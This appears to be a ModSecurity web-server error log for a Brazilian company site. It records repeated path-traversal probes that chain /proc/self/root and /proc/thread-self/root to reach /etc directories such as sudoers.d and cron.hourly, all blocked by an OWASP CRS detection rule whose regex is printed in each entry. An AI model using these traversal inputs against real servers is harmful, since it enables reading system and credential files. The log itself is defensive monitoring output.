https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:45.450086 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:40304] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm2Zqj1wV0Si-OkefNSgAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:45.800016 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:48552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm2XjZBu2q05ozVU85YwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:48.115597 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:48560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm3P9ocpUE4ed4uDzSrwAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:49.060348 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:40314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm3f9ocpUE4ed4uDzSsQAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:51.603471 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:48570] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm3xXjF1vJNtV6CWrevQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:52.930501 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:50612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm4Jqj1wV0Si-OkefNSwAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:54.231780 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:50616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm4tSswJuvopo3lOhE7AAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:55.119735 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:37934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm43jZBu2q05ozVU85aAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:55.537449 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:50620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm47ABkC4fWIHEf8HP5QAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:55.787097 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:50620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm47ABkC4fWIHEf8HP5gAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:17:57.476220 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:37948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm5QlT9VtDQc7bgUyL8gAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:17:58.739085 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:36080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm5rysWC90G-1nBrAqMAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:00.871808 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:36092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm6HbQATo66fKoS7wuWAAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:11.055793 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:50628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm8_9ocpUE4ed4uDzSvwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:12.377148 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:54806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm9I6lpbStxTqkSktRkwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:14.671735 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:54816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm9pqj1wV0Si-OkefNTwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:15.113040 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.241.46:36106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm93bQATo66fKoS7wuZgAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:15.954265 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:54820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm99SswJuvopo3lOhE7gAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:20.527621 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:54830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm_NSswJuvopo3lOhE8gAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:20.704914 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:59476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfm_AlT9VtDQc7bgUyL_AAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:25.065221 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:48008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnAbysWC90G-1nBrAqNgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:26.400095 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:48024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnAnbQATo66fKoS7wuZwAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:27.602443 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:48030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnA46lpbStxTqkSktRlwAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
